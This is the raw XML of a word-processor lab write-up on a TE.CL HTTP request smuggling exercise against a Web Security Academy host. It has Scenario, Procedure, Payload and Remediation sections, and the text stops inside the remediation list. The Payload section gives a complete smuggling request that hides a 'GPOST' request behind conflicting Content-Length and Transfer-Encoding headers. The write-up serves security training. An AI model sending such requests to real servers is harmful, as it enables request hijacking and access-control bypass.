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E377E" w14:textId="456CB598" w:rsidR="00320924" w:rsidRDefault="0038190F" w:rsidP="00DC1F12">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SCENARIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E100013" w14:textId="37A102A6" w:rsidR="0038190F" w:rsidRPr="00DB03A9" w:rsidRDefault="001C116F" w:rsidP="001C116F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This application </w:t>
      </w:r>
      <w:r w:rsidR="000E1F7D" w:rsidRPr="000E1F7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>involves a front-end and back-end server, and the back-end server doesn't support chunked encoding. The front-end server rejects requests that aren't using the GET or POST method</w:t>
      </w:r>
      <w:r w:rsidRPr="001C116F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> We will try to </w:t>
      </w:r>
      <w:r w:rsidRPr="001C116F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>smuggle a request to the back-end server, so that the next request processed by the back-end server appears to use the method GPOST</w:t>
      </w:r>
      <w:r w:rsidR="00184A3E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B581D0C" w14:textId="77777777" w:rsidR="0038190F" w:rsidRDefault="0038190F" w:rsidP="00DC1F12">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41C86A0C" w14:textId="3E6ADA0C" w:rsidR="0038190F" w:rsidRDefault="0038190F" w:rsidP="00DC1F12">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PROCEDURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2868DC9D" w14:textId="137323AC" w:rsidR="0038190F" w:rsidRDefault="00D9364E" w:rsidP="000141D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Open the web application and send the GET request </w:t>
      </w:r>
      <w:r w:rsidR="007B0901">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">for homepage </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BurpSuite’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Repeater.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137E6699" w14:textId="46F679BC" w:rsidR="007B0901" w:rsidRDefault="007B0901" w:rsidP="000141D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Now right click on the request and click </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Change Request Method </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to change the request to </w:t>
      </w:r>
      <w:r w:rsidRPr="007B0901">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as we </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can not</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> send body for </w:t>
      </w:r>
      <w:r w:rsidRPr="007B0901">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048EB7A2" w14:textId="40312B9C" w:rsidR="00DC5264" w:rsidRPr="000141D4" w:rsidRDefault="00355D0A" w:rsidP="000141D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Inject the payload in the Repeater tab and send the request twice</w:t>
      </w:r>
      <w:r w:rsidR="00C15196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D3E82D" w14:textId="77777777" w:rsidR="0038190F" w:rsidRDefault="0038190F" w:rsidP="00DC1F12">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37861B7F" w14:textId="75099CD9" w:rsidR="0038190F" w:rsidRDefault="0038190F" w:rsidP="00DC1F12">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PAYLOAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FA64F8" w14:textId="77777777" w:rsidR="0022477F" w:rsidRPr="0022477F" w:rsidRDefault="0022477F" w:rsidP="0022477F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022477F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>POST / HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F007EAC" w14:textId="77777777" w:rsidR="0022477F" w:rsidRPr="0022477F" w:rsidRDefault="0022477F" w:rsidP="0022477F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022477F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Host: 0ad400270476fb1b8151c55c00b600c5.web-security-academy.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41085AA3" w14:textId="77777777" w:rsidR="0022477F" w:rsidRPr="0022477F" w:rsidRDefault="0022477F" w:rsidP="0022477F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022477F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022477F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7889E3FF" w14:textId="77777777" w:rsidR="0022477F" w:rsidRPr="0022477F" w:rsidRDefault="0022477F" w:rsidP="0022477F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022477F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Content-Length: 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFCA419" w14:textId="77777777" w:rsidR="0022477F" w:rsidRPr="0022477F" w:rsidRDefault="0022477F" w:rsidP="0022477F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022477F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Transfer-Encoding: chunked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633033AA" w14:textId="77777777" w:rsidR="0022477F" w:rsidRPr="0022477F" w:rsidRDefault="0022477F" w:rsidP="0022477F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B3ADFC4" w14:textId="77777777" w:rsidR="0022477F" w:rsidRPr="0022477F" w:rsidRDefault="0022477F" w:rsidP="0022477F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022477F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA74855" w14:textId="77777777" w:rsidR="0022477F" w:rsidRPr="0022477F" w:rsidRDefault="0022477F" w:rsidP="0022477F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022477F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GPOST / HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288EAE76" w14:textId="77777777" w:rsidR="0022477F" w:rsidRPr="0022477F" w:rsidRDefault="0022477F" w:rsidP="0022477F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022477F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022477F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04C7A695" w14:textId="77777777" w:rsidR="0022477F" w:rsidRPr="0022477F" w:rsidRDefault="0022477F" w:rsidP="0022477F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022477F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Content-Length: 15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4E6111" w14:textId="77777777" w:rsidR="0022477F" w:rsidRPr="0022477F" w:rsidRDefault="0022477F" w:rsidP="0022477F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BEEB932" w14:textId="77777777" w:rsidR="0022477F" w:rsidRPr="0022477F" w:rsidRDefault="0022477F" w:rsidP="0022477F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022477F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00437BEC" w14:textId="77777777" w:rsidR="0022477F" w:rsidRDefault="0022477F" w:rsidP="0022477F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022477F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C00B096" w14:textId="77777777" w:rsidR="0022477F" w:rsidRDefault="0022477F" w:rsidP="0022477F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58BDEA8D" w14:textId="4FE15186" w:rsidR="0022477F" w:rsidRDefault="007F4EF6" w:rsidP="007F4EF6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F4EF6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="25B8F25F" wp14:editId="120154DA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>673735</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5801535" cy="5591955"/>
            <wp:effectExtent l="0" t="0" r="8890" b="8890"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1203565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65108" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5801535" cy="5591955"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PROOF OF CONCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FCCA33" w14:textId="27BE7027" w:rsidR="007F4EF6" w:rsidRPr="007F4EF6" w:rsidRDefault="007F4EF6" w:rsidP="007F4EF6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F7151E6" w14:textId="77777777" w:rsidR="0038190F" w:rsidRDefault="0038190F" w:rsidP="00DC1F12">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BFD9913" w14:textId="4D0A110D" w:rsidR="0038190F" w:rsidRDefault="0038190F" w:rsidP="00DC1F12">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REMEDIATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4073A07D" w14:textId="77777777" w:rsidR="007B57E4" w:rsidRPr="007B57E4" w:rsidRDefault="007B57E4" w:rsidP="007B57E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B57E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enforce Uniform HTTP Request Parsing:</w:t>
      </w:r>
      <w:r w:rsidRPr="007B57E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Both the front-end and back-end servers should parse HTTP requests uniformly. Differences in request parsing can introduce vulnerabilities, such as smuggling opportunities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4B6D48" w14:textId="77777777" w:rsidR="007B57E4" w:rsidRPr="007B57E4" w:rsidRDefault="007B57E4" w:rsidP="007B57E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B57E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Prohibit Unnecessary Transfer Encodings:</w:t>
      </w:r>
      <w:r w:rsidRPr="007B57E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> If "Transfer-Encoding: chunked" or other encodings aren't required, they should be stripped or blocked server-side. Servers should be configured to only allow expected and supported encodings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2AA0A7" w14:textId="77777777" w:rsidR="007B57E4" w:rsidRPr="007B57E4" w:rsidRDefault="007B57E4" w:rsidP="007B57E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B57E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Use Web Application Firewalls (WAFs):</w:t>
      </w:r>
      <w:r w:rsidRPr="007B57E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> A WAF can detect and block unusual request patterns and encodings. When configured correctly, it can prevent many web-based attack attempts, including smuggling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE25F94" w14:textId="77777777" w:rsidR="007B57E4" w:rsidRPr="007B57E4" w:rsidRDefault="007B57E4" w:rsidP="007B57E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B57E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Update and Patch Servers:</w:t>
      </w:r>
      <w:r w:rsidRPr="007B57E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Keep both the front-end and back-end servers updated with the latest patches. Many modern servers and web application platforms have built-in defenses against vulnerabilities, including HTTP Request Smuggling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED22CEF" w14:textId="51571306" w:rsidR="0027128C" w:rsidRPr="007B57E4" w:rsidRDefault="007B57E4" w:rsidP="007B57E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B57E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
